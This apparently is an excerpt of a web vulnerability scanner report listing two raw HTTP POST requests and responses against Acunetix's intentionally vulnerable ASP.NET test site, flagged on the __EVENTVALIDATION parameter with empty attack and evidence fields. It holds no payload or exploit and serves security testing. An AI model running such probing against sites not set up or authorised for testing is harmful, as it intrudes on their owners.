Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1177 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,177 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8585&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgAAPJwhfNsIZGRkhW9ckHKpWtyrzG3DCzhWnyeXaqE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKu4fP%2FBgKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCjZysdTSa2jeODXtg4LAb5vUQmxy
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:48 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgAAPJwhfNsIZGRkhW9ckHKpWtyrzG3DCzhWnyeXaqE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKu4fP/BgKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCjZysdTSa2jeODXtg4LAb5vUQmxy" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:White" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8196&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAiyl0StoIZGRkFu10AKy%2FWNUnIIYSoG9f%2BgCh6Bs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKulvf1CwK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9%2FTmSpN%2BjZZiKY3%2FIeAXAojtnGcQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:12:22 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAiyl0StoIZGRkFu10AKy/WNUnIIYSoG9f+gCh6Bs=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKulvf1CwK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9/TmSpN+jZZiKY3/IeAXAojtnGcQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:White" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. 